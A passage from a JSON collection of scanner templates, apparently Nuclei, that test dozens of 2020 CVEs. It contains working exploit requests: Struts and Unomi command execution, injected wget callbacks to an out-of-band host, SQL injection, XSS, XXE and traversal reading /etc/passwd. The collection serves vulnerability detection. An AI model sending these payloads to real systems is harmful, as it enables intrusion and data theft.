5.0.2 - CRLF Injection","severity":"medium"},"requests":[{"raw":["GET /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nset_session={{session}}&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token={{token}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["^test:crlfinjection=1$"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"session","group":1,"regex":["name=\"set_session\" value=\"([a-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"token\" value=\"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10189","info":{"name":"ManageEngine Desktop Central Java Deserialization","severity":"critical"},"requests":[{"raw":["POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{generate_java_gadget(\"commons-collections3.1\",\"wget http://{{interactsh-url}}\",\"raw\")}}\n"],"matchers":[{"type":"status","status":[200],"internal":true}]},{"raw":["GET /cewolf/?img=%5Clogger.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24701","info":{"name":"OX Appsuite - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request with action all","<script>alert(document.domain);</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-12259","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /configDevice.php?rid=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-28429","info":{"name":"geojson2kml - Command Injection","severity":"critical"},"requests":[{"raw":["POST /convert HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"fileName\": \"& echo \\\"{{randstr}}\\\" > {{filename}}.txt && ls\",\n  \"geoJsonData\": {\n    \"type\": \"FeatureCollection\",\n    \"features\": [\n      {\n        \"type\": \"Feature\",\n        \"geometry\": {\n          \"type\": \"Point\",\n          \"coordinates\": [102.0, 0.5]\n        },\n        \"properties\": {\n          \"prop0\": \"value0\"\n        }\n      }\n    ]\n  }\n}\n","GET /file/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"word","part":"body","words":["window.location.href.indexOf"],"negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information 